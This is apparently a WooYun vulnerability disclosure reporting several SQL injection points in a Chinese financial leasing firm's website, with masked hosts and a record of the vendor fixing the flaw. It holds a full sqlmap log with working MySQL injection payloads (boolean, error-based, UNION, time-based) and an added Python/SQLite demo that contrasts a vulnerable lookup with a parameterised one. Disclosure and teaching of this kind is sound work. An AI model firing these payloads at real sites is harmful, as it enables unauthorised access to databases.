WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2016-02-16: Details sent to the vendor; awaiting vendor action.
2016-02-17: Vendor confirmed; details disclosed to the vendor only.
2016-02-17: Vendor fixed the vulnerability and disclosed it proactively; details now public.
Multiple SQL injections on the main site of China Financial Leasing Group (batch submission)
[Injection points]:
http://**.**.**.**/c/industry_news_details.php?itemid=479&page=1
http://www.**.**.**.**/c/corp_news_details.php?itemid=455&page=01
http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01
They live in different files (some differ only by subdirectory), so they are separate injection points.
[Manual test] Modify the request to: http://**.**.**.**/s/corp_news_details.php?itemid=455%27&page=01
The response is an error message, and it leaks the filesystem path.
[sqlmap screenshot] Database information:
[WooYun duplicate check] I searched for the vendor name and found only http://**.**.**.**/bugs/wooyun-2010-0163764, but the file in my report is not the same as that one.
Full sqlmap run:
[10:07:16] [INFO] testing connection to the target URL
[10:07:17] [INFO] testing if the target URL is stable. This can take a couple of seconds
[10:07:18] [INFO] target URL is stable
[10:07:18] [INFO] testing if GET parameter 'itemid' is dynamic
[10:07:18] [INFO] confirming that GET parameter 'itemid' is dynamic
[10:07:18] [INFO] GET parameter 'itemid' is dynamic
[10:07:19] [INFO] heuristic (basic) test shows that GET parameter 'itemid' might be injectable (possible DBMS: 'MySQL')
[10:07:19] [INFO] testing for SQL injection on GET parameter 'itemid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:07:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:07:21] [WARNING] reflective value(s) found and filtering out
[10:07:22] [INFO] GET parameter 'itemid' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:07:22] [INFO] GET parameter 'itemid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL inline queries'
[10:07:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:07:23] [WARNING] time-based comparison requires larger statistical model, please wait..................
[10:07:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:07:37] [INFO] GET parameter 'itemid' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[10:07:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:07:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:07:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:07:38] [INFO] target URL appears to have 5 columns in query
[10:07:40] [INFO] GET parameter 'itemid' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'itemid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: itemid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: itemid=455 AND 2922=2922&page=01

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: itemid=455 AND (SELECT 1959 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (CASE WHEN (1959=1959) THEN 1 ELSE 0 END)),0x716a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=01

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: itemid=455 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7671,0x477a427148656c74436d,0x716a627171),NULL,NULL#&page=01

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: itemid=455 AND SLEEP(5)&page=01
---
[10:07:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2
back-end DBMS: MySQL 5.0
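Added example, not part of the original report: a Python/SQLite model of the query pattern that sqlmap's findings imply. The site's PHP source and table schema are not on the page, so the table `corp_news`, its five columns and the lookup functions are assumptions. It replays the report's own probes against a concatenating lookup and a parameterised one: the stray quote from the manual test that produced a database error, the boolean-based `AND 2922=2922` condition (plus a false counterpart, which is how blind extraction distinguishes rows), and the 5-column UNION carrying sqlmap's marker string (the hex in CONCAT(0x71627a7671,0x477a427148656c74436d,0x716a627171) decodes to qbzvq + GzBqHeltCm + qjbqq). The error-based FLOOR(RAND(0)*2) GROUP BY payload and SLEEP(5) are MySQL-specific and are not reproduced in SQLite; for the same reason CONCAT becomes `||` and the `#` comment becomes `--`.

```python
import sqlite3

# What sqlmap's CONCAT(0x71627a7671,0x477a427148656c74436d,0x716a627171) decodes to:
# a random prefix/suffix around a random token, so the tool can find its own
# value in the response body and confirm that the UNION column is rendered.
MARKER = "qbzvq" + "GzBqHeltCm" + "qjbqq"

SELECT = "SELECT itemid, title, body, author, pubdate FROM corp_news WHERE itemid="


def make_db():
    """Constructed stand-in for the news table (assumption: real schema unknown)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE corp_news("
        "itemid INTEGER, title TEXT, body TEXT, author TEXT, pubdate TEXT)"
    )
    conn.executemany(
        "INSERT INTO corp_news VALUES (?, ?, ?, ?, ?)",
        [
            (455, "Corporate news item", "constructed body", "editor", "2016-01-10"),
            (479, "Industry news item", "constructed body", "editor", "2016-02-01"),
        ],
    )
    return conn


def vulnerable_lookup(conn, itemid):
    """Hypothetical reconstruction of the bug: the raw GET value is glued into SQL."""
    return conn.execute(SELECT + itemid).fetchall()


def hardened_lookup(conn, itemid):
    """Allow-list the value's shape, then bind it so it can never become SQL."""
    if not itemid.isdigit():
        raise ValueError("itemid must be a positive integer")
    return conn.execute(SELECT + "?", (int(itemid),)).fetchall()


def probe(lookup, payload):
    """Run one payload against a fresh database and classify the outcome."""
    conn = make_db()
    try:
        return ("rows", lookup(conn, payload))
    except sqlite3.Error as exc:        # the "error message" seen in the manual test
        return ("db_error", type(exc).__name__)
    except ValueError:                  # hardened path refused the input
        return ("rejected", None)
    finally:
        conn.close()


# The report's probes, adapted to SQLite syntax where noted.
PAYLOADS = {
    "baseline": "455",
    "quote": "455'",                          # manual test: itemid=455%27
    "bool_true": "455 AND 2922=2922",         # sqlmap boolean-based payload
    "bool_false": "455 AND 2922=2923",        # its false twin: page content changes
    # sqlmap UNION payload; CONCAT -> ||, trailing '#' -> '--' for SQLite
    "union": "455 UNION ALL SELECT NULL,NULL,'qbzvq'||'GzBqHeltCm'||'qjbqq',NULL,NULL-- ",
}


def run_all(lookup):
    """Map each payload name to probe()'s (kind, detail) result for one lookup."""
    return {name: probe(lookup, payload) for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    for label, fn in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        print(f"== {label} ==")
        for name, result in run_all(fn).items():
            print(f"{name:>10}: {result}")
```

Against the concatenating lookup the quote yields a database error, the true and false boolean pairs return the real row and an empty set respectively, and the UNION appends a fabricated row whose third column is the marker; the parameterised lookup returns the same baseline row and rejects every other payload before any SQL is run.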
PS: A question for the reviewers: when submitting vulnerabilities for Hong Kong or Taiwan sites in the future, do they all need to be converted to Traditional Chinese, or is Simplified fine?
Severity: High
Vulnerability Rank: 13
Confirmed: 2016-02-17 12:38
The incident has been reported to the relevant organisation.
2016-02-17: The relevant organisation reported that the vulnerability has been fixed.